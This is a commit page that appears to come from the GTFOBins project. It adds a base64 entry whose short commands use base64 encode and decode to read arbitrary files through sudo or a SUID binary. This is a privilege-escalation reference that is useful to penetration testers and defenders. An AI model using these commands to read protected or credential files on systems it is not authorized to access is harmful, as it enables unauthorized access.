Add base64, ltrace, make, sqlite3, time
This commit is contained in:
15
_gtfobins/base64.md
Normal file
15
_gtfobins/base64.md
Normal file
@@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo base64 "$LFILE" | base64 -d
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./base64 "$LFILE" | base64 -d
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
base64 "$LFILE" | base64 -d
|
||||
---
|
||||
Reference in New Issue
Block a user